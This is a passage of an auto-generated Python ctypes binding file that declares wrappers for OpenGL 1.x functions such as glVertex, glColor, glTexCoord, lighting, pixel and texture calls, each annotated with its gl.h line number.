# /usr/include/GL/gl.h:914
glLoadMatrixf = _link_function('glLoadMatrixf', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:916
glMultMatrixd = _link_function('glMultMatrixd', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:917
glMultMatrixf = _link_function('glMultMatrixf', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:919
glRotated = _link_function('glRotated', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:921
glRotatef = _link_function('glRotatef', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:924
glScaled = _link_function('glScaled', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:925
glScalef = _link_function('glScalef', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:927
glTranslated = _link_function('glTranslated', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:928
glTranslatef = _link_function('glTranslatef', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:935
glIsList = _link_function('glIsList', GLboolean, [GLuint], None)
# /usr/include/GL/gl.h:937
glDeleteLists = _link_function('glDeleteLists', None, [GLuint, GLsizei], None)
# /usr/include/GL/gl.h:939
glGenLists = _link_function('glGenLists', GLuint, [GLsizei], None)
# /usr/include/GL/gl.h:941
glNewList = _link_function('glNewList', None, [GLuint, GLenum], None)
# /usr/include/GL/gl.h:943
glEndList = _link_function('glEndList', None, [], None)
# /usr/include/GL/gl.h:945
glCallList = _link_function('glCallList', None, [GLuint], None)
# /usr/include/GL/gl.h:947
glCallLists = _link_function('glCallLists', None, [GLsizei, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:950
glListBase = _link_function('glListBase', None, [GLuint], None)
# /usr/include/GL/gl.h:957
glBegin = _link_function('glBegin', None, [GLenum], None)
# /usr/include/GL/gl.h:959
glEnd = _link_function('glEnd', None, [], None)
# /usr/include/GL/gl.h:962
glVertex2d = _link_function('glVertex2d', None, [GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:963
glVertex2f = _link_function('glVertex2f', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:964
glVertex2i = _link_function('glVertex2i', None, [GLint, GLint], None)
# /usr/include/GL/gl.h:965
glVertex2s = _link_function('glVertex2s', None, [GLshort, GLshort], None)
# /usr/include/GL/gl.h:967
glVertex3d = _link_function('glVertex3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:968
glVertex3f = _link_function('glVertex3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:969
glVertex3i = _link_function('glVertex3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:970
glVertex3s = _link_function('glVertex3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:972
glVertex4d = _link_function('glVertex4d', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:973
glVertex4f = _link_function('glVertex4f', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:974
glVertex4i = _link_function('glVertex4i', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:975
glVertex4s = _link_function('glVertex4s', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:977
glVertex2dv = _link_function('glVertex2dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:978
glVertex2fv = _link_function('glVertex2fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:979
glVertex2iv = _link_function('glVertex2iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:980
glVertex2sv = _link_function('glVertex2sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:982
glVertex3dv = _link_function('glVertex3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:983
glVertex3fv = _link_function('glVertex3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:984
glVertex3iv = _link_function('glVertex3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:985
glVertex3sv = _link_function('glVertex3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:987
glVertex4dv = _link_function('glVertex4dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:988
glVertex4fv = _link_function('glVertex4fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:989
glVertex4iv = _link_function('glVertex4iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:990
glVertex4sv = _link_function('glVertex4sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:993
glNormal3b = _link_function('glNormal3b', None, [GLbyte, GLbyte, GLbyte], None)
# /usr/include/GL/gl.h:994
glNormal3d = _link_function('glNormal3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:995
glNormal3f = _link_function('glNormal3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:996
glNormal3i = _link_function('glNormal3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:997
glNormal3s = _link_function('glNormal3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:999
glNormal3bv = _link_function('glNormal3bv', None, [POINTER(GLbyte)], None)
# /usr/include/GL/gl.h:1000
glNormal3dv = _link_function('glNormal3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1001
glNormal3fv = _link_function('glNormal3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1002
glNormal3iv = _link_function('glNormal3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1003
glNormal3sv = _link_function('glNormal3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1006
glIndexd = _link_function('glIndexd', None, [GLdouble], None)
# /usr/include/GL/gl.h:1007
glIndexf = _link_function('glIndexf', None, [GLfloat], None)
# /usr/include/GL/gl.h:1008
glIndexi = _link_function('glIndexi', None, [GLint], None)
# /usr/include/GL/gl.h:1009
glIndexs = _link_function('glIndexs', None, [GLshort], None)
# /usr/include/GL/gl.h:1010
glIndexub = _link_function('glIndexub', None, [GLubyte], None)
# /usr/include/GL/gl.h:1012
glIndexdv = _link_function('glIndexdv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1013
glIndexfv = _link_function('glIndexfv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1014
glIndexiv = _link_function('glIndexiv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1015
glIndexsv = _link_function('glIndexsv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1016
glIndexubv = _link_function('glIndexubv', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:1018
glColor3b = _link_function('glColor3b', None, [GLbyte, GLbyte, GLbyte], None)
# /usr/include/GL/gl.h:1019
glColor3d = _link_function('glColor3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1020
glColor3f = _link_function('glColor3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1021
glColor3i = _link_function('glColor3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1022
glColor3s = _link_function('glColor3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1023
glColor3ub = _link_function('glColor3ub', None, [GLubyte, GLubyte, GLubyte], None)
# /usr/include/GL/gl.h:1024
glColor3ui = _link_function('glColor3ui', None, [GLuint, GLuint, GLuint], None)
# /usr/include/GL/gl.h:1025
glColor3us = _link_function('glColor3us', None, [GLushort, GLushort, GLushort], None)
# /usr/include/GL/gl.h:1027
glColor4b = _link_function('glColor4b', None, [GLbyte, GLbyte, GLbyte, GLbyte], None)
# /usr/include/GL/gl.h:1029
glColor4d = _link_function('glColor4d', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1031
glColor4f = _link_function('glColor4f', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1033
glColor4i = _link_function('glColor4i', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1035
glColor4s = _link_function('glColor4s', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1037
glColor4ub = _link_function('glColor4ub', None, [GLubyte, GLubyte, GLubyte, GLubyte], None)
# /usr/include/GL/gl.h:1039
glColor4ui = _link_function('glColor4ui', None, [GLuint, GLuint, GLuint, GLuint], None)
# /usr/include/GL/gl.h:1041
glColor4us = _link_function('glColor4us', None, [GLushort, GLushort, GLushort, GLushort], None)
# /usr/include/GL/gl.h:1045
glColor3bv = _link_function('glColor3bv', None, [POINTER(GLbyte)], None)
# /usr/include/GL/gl.h:1046
glColor3dv = _link_function('glColor3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1047
glColor3fv = _link_function('glColor3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1048
glColor3iv = _link_function('glColor3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1049
glColor3sv = _link_function('glColor3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1050
glColor3ubv = _link_function('glColor3ubv', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:1051
glColor3uiv = _link_function('glColor3uiv', None, [POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1052
glColor3usv = _link_function('glColor3usv', None, [POINTER(GLushort)], None)
# /usr/include/GL/gl.h:1054
glColor4bv = _link_function('glColor4bv', None, [POINTER(GLbyte)], None)
# /usr/include/GL/gl.h:1055
glColor4dv = _link_function('glColor4dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1056
glColor4fv = _link_function('glColor4fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1057
glColor4iv = _link_function('glColor4iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1058
glColor4sv = _link_function('glColor4sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1059
glColor4ubv = _link_function('glColor4ubv', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:1060
glColor4uiv = _link_function('glColor4uiv', None, [POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1061
glColor4usv = _link_function('glColor4usv', None, [POINTER(GLushort)], None)
# /usr/include/GL/gl.h:1064
glTexCoord1d = _link_function('glTexCoord1d', None, [GLdouble], None)
# /usr/include/GL/gl.h:1065
glTexCoord1f = _link_function('glTexCoord1f', None, [GLfloat], None)
# /usr/include/GL/gl.h:1066
glTexCoord1i = _link_function('glTexCoord1i', None, [GLint], None)
# /usr/include/GL/gl.h:1067
glTexCoord1s = _link_function('glTexCoord1s', None, [GLshort], None)
# /usr/include/GL/gl.h:1069
glTexCoord2d = _link_function('glTexCoord2d', None, [GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1070
glTexCoord2f = _link_function('glTexCoord2f', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1071
glTexCoord2i = _link_function('glTexCoord2i', None, [GLint, GLint], None)
# /usr/include/GL/gl.h:1072
glTexCoord2s = _link_function('glTexCoord2s', None, [GLshort, GLshort], None)
# /usr/include/GL/gl.h:1074
glTexCoord3d = _link_function('glTexCoord3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1075
glTexCoord3f = _link_function('glTexCoord3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1076
glTexCoord3i = _link_function('glTexCoord3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1077
glTexCoord3s = _link_function('glTexCoord3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1079
glTexCoord4d = _link_function('glTexCoord4d', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1080
glTexCoord4f = _link_function('glTexCoord4f', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1081
glTexCoord4i = _link_function('glTexCoord4i', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1082
glTexCoord4s = _link_function('glTexCoord4s', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1084
glTexCoord1dv = _link_function('glTexCoord1dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1085
glTexCoord1fv = _link_function('glTexCoord1fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1086
glTexCoord1iv = _link_function('glTexCoord1iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1087
glTexCoord1sv = _link_function('glTexCoord1sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1089
glTexCoord2dv = _link_function('glTexCoord2dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1090
glTexCoord2fv = _link_function('glTexCoord2fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1091
glTexCoord2iv = _link_function('glTexCoord2iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1092
glTexCoord2sv = _link_function('glTexCoord2sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1094
glTexCoord3dv = _link_function('glTexCoord3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1095
glTexCoord3fv = _link_function('glTexCoord3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1096
glTexCoord3iv = _link_function('glTexCoord3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1097
glTexCoord3sv = _link_function('glTexCoord3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1099
glTexCoord4dv = _link_function('glTexCoord4dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1100
glTexCoord4fv = _link_function('glTexCoord4fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1101
glTexCoord4iv = _link_function('glTexCoord4iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1102
glTexCoord4sv = _link_function('glTexCoord4sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1105
glRasterPos2d = _link_function('glRasterPos2d', None, [GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1106
glRasterPos2f = _link_function('glRasterPos2f', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1107
glRasterPos2i = _link_function('glRasterPos2i', None, [GLint, GLint], None)
# /usr/include/GL/gl.h:1108
glRasterPos2s = _link_function('glRasterPos2s', None, [GLshort, GLshort], None)
# /usr/include/GL/gl.h:1110
glRasterPos3d = _link_function('glRasterPos3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1111
glRasterPos3f = _link_function('glRasterPos3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1112
glRasterPos3i = _link_function('glRasterPos3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1113
glRasterPos3s = _link_function('glRasterPos3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1115
glRasterPos4d = _link_function('glRasterPos4d', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1116
glRasterPos4f = _link_function('glRasterPos4f', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1117
glRasterPos4i = _link_function('glRasterPos4i', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1118
glRasterPos4s = _link_function('glRasterPos4s', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1120
glRasterPos2dv = _link_function('glRasterPos2dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1121
glRasterPos2fv = _link_function('glRasterPos2fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1122
glRasterPos2iv = _link_function('glRasterPos2iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1123
glRasterPos2sv = _link_function('glRasterPos2sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1125
glRasterPos3dv = _link_function('glRasterPos3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1126
glRasterPos3fv = _link_function('glRasterPos3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1127
glRasterPos3iv = _link_function('glRasterPos3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1128
glRasterPos3sv = _link_function('glRasterPos3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1130
glRasterPos4dv = _link_function('glRasterPos4dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1131
glRasterPos4fv = _link_function('glRasterPos4fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1132
glRasterPos4iv = _link_function('glRasterPos4iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1133
glRasterPos4sv = _link_function('glRasterPos4sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1136
glRectd = _link_function('glRectd', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1137
glRectf = _link_function('glRectf', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1138
glRecti = _link_function('glRecti', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1139
glRects = _link_function('glRects', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1142
glRectdv = _link_function('glRectdv', None, [POINTER(GLdouble), POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1143
glRectfv = _link_function('glRectfv', None, [POINTER(GLfloat), POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1144
glRectiv = _link_function('glRectiv', None, [POINTER(GLint), POINTER(GLint)], None)
# /usr/include/GL/gl.h:1145
glRectsv = _link_function('glRectsv', None, [POINTER(GLshort), POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1152
glVertexPointer = _link_function('glVertexPointer', None, [GLint, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1155
glNormalPointer = _link_function('glNormalPointer', None, [GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1158
glColorPointer = _link_function('glColorPointer', None, [GLint, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1161
glIndexPointer = _link_function('glIndexPointer', None, [GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1164
glTexCoordPointer = _link_function('glTexCoordPointer', None, [GLint, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1167
glEdgeFlagPointer = _link_function('glEdgeFlagPointer', None, [GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1169
glGetPointerv = _link_function('glGetPointerv', None, [GLenum, POINTER(POINTER(GLvoid))], None)
# /usr/include/GL/gl.h:1171
glArrayElement = _link_function('glArrayElement', None, [GLint], None)
# /usr/include/GL/gl.h:1173
glDrawArrays = _link_function('glDrawArrays', None, [GLenum, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1175
glDrawElements = _link_function('glDrawElements', None, [GLenum, GLsizei, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1178
glInterleavedArrays = _link_function('glInterleavedArrays', None, [GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1185
glShadeModel = _link_function('glShadeModel', None, [GLenum], None)
# /usr/include/GL/gl.h:1187
glLightf = _link_function('glLightf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1188
glLighti = _link_function('glLighti', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1189
glLightfv = _link_function('glLightfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1191
glLightiv = _link_function('glLightiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1194
glGetLightfv = _link_function('glGetLightfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1196
glGetLightiv = _link_function('glGetLightiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1199
glLightModelf = _link_function('glLightModelf', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1200
glLightModeli = _link_function('glLightModeli', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1201
glLightModelfv = _link_function('glLightModelfv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1202
glLightModeliv = _link_function('glLightModeliv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1204
glMaterialf = _link_function('glMaterialf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1205
glMateriali = _link_function('glMateriali', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1206
glMaterialfv = _link_function('glMaterialfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1207
glMaterialiv = _link_function('glMaterialiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1209
glGetMaterialfv = _link_function('glGetMaterialfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1210
glGetMaterialiv = _link_function('glGetMaterialiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1212
glColorMaterial = _link_function('glColorMaterial', None, [GLenum, GLenum], None)
# /usr/include/GL/gl.h:1219
glPixelZoom = _link_function('glPixelZoom', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1221
glPixelStoref = _link_function('glPixelStoref', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1222
glPixelStorei = _link_function('glPixelStorei', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1224
glPixelTransferf = _link_function('glPixelTransferf', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1225
glPixelTransferi = _link_function('glPixelTransferi', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1227
glPixelMapfv = _link_function('glPixelMapfv', None, [GLenum, GLsizei, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1229
glPixelMapuiv = _link_function('glPixelMapuiv', None, [GLenum, GLsizei, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1231
glPixelMapusv = _link_function('glPixelMapusv', None, [GLenum, GLsizei, POINTER(GLushort)], None)
# /usr/include/GL/gl.h:1234
glGetPixelMapfv = _link_function('glGetPixelMapfv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1235
glGetPixelMapuiv = _link_function('glGetPixelMapuiv', None, [GLenum, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1236
glGetPixelMapusv = _link_function('glGetPixelMapusv', None, [GLenum, POINTER(GLushort)], None)
# /usr/include/GL/gl.h:1238
glBitmap = _link_function('glBitmap', None, [GLsizei, GLsizei, GLfloat, GLfloat, GLfloat, GLfloat, POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:1243
glReadPixels = _link_function('glReadPixels', None, [GLint, GLint, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1248
glDrawPixels = _link_function('glDrawPixels', None, [GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1252
glCopyPixels = _link_function('glCopyPixels', None, [GLint, GLint, GLsizei, GLsizei, GLenum], None)
# /usr/include/GL/gl.h:1260
glStencilFunc = _link_function('glStencilFunc', None, [GLenum, GLint, GLuint], None)
# /usr/include/GL/gl.h:1262
glStencilMask = _link_function('glStencilMask', None, [GLuint], None)
# /usr/include/GL/gl.h:1264
glStencilOp = _link_function('glStencilOp', None, [GLenum, GLenum, GLenum], None)
# /usr/include/GL/gl.h:1266
glClearStencil = _link_function('glClearStencil', None, [GLint], None)
# /usr/include/GL/gl.h:1274
glTexGend = _link_function('glTexGend', None, [GLenum, GLenum, GLdouble], None)
# /usr/include/GL/gl.h:1275
glTexGenf = _link_function('glTexGenf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1276
glTexGeni = _link_function('glTexGeni', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1278
glTexGendv = _link_function('glTexGendv', None, [GLenum, GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1279
glTexGenfv = _link_function('glTexGenfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1280
glTexGeniv = _link_function('glTexGeniv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1282
glGetTexGendv = _link_function('glGetTexGendv', None, [GLenum, GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1283
glGetTexGenfv = _link_function('glGetTexGenfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1284
glGetTexGeniv = _link_function('glGetTexGeniv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1287
glTexEnvf = _link_function('glTexEnvf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1288
glTexEnvi = _link_function('glTexEnvi', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1290
glTexEnvfv = _link_function('glTexEnvfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1291
glTexEnviv = _link_function('glTexEnviv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1293
glGetTexEnvfv = _link_function('glGetTexEnvfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1294
glGetTexEnviv = _link_function('glGetTexEnviv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1297
glTexParameterf = _link_function('glTexParameterf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1298
glTexParameteri = _link_function('glTexParameteri', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1300
glTexParameterfv = _link_function('glTexParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1302
glTexParameteriv = _link_function('glTexParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1305
glGetTexParameterfv = _link_function('glGetTexParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1307
glGetTexParameteriv = _link_function('glGetTexParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1310
glGetTexLevelParameterfv = _link_function('glGetTexLevelParameterfv', None, [GLenum, GLint, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1312
glGetTexLevelParameteriv = _link_function('glGetTexLevelParameteriv', None, [GLenum, GLint, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1316
glTexImage1D = _link_function('glTexImage1D', None, [GLenum, GLint, GLint, GLsizei, GLint, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1322
glTexImage2D = _link_function('glTexImage2D', None, [GLenum, GLint, GLint, GLsizei, GLsizei, GLint, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1328
glGetTexImage = _link_function('glGetTexImage', None, [GLenum, GLint, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1335
glGenTextures = _link_function('glGenTextures', None, [GLsizei, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1337
glDeleteTextures = _link_function('glDeleteTextures', None, [GLsizei, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1339
glBindTexture = _link_function('glBindTexture', None, [GLenum, GLuint], None)
# /usr/include/GL/gl.h:1341
glPrioritizeTextures = _link_function('glPrioritizeTextures', None, [GLsizei, POINTER(GLuint), POINTER(GLclampf)], None)
# /usr/include/GL/gl.h:1345
glAreTexturesResident = _link_function('glAreTexturesResident', GLboolean, [GLsizei, POINTER(GLuint), POINTER(GLboolean)], None)
# /usr/include/GL/gl.h:1349
glIsTexture = _link_function('glIsTexture', GLboolean, [GLuint], None)
# /usr/include/GL/gl.h:1352
glTexSubImage1D = _link_function('glTexSubImage1D', None, [GLenum, GLint, GLint, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1358
glTexSubImage2D = _link_function('glTexSubImage2D', None, [GLenum, GLint, GLint, GLint, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1365
glCopyTexImage1D = _link_function('glCopyTexImage1D', None, [GLenum, GLint, GLenum, GLint, GLint, GLsizei, GLint], None)
# /usr/include/GL/gl.h:1371
glCopyTexImage2D = _link_function('glCopyTexImage2D', None, [GLenum, GLint, GLenum, GLint, GLint, GLsizei, GLsizei, GLint], None)
# /usr/include/GL/gl.h:1378
glCopyTexSubImage1D = _link_function('glCopyTexSubImage1D', None, [GLenum, GLint, GLint, GLint, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1383
glCopyTexSubImage2D = _link_function('glCopyTexSubImage2D', None, [GLenum, GLint, GLint, GLint, GLint, GLint, GLsizei, GLsizei], None)
# /usr/include/GL/gl.h:1393
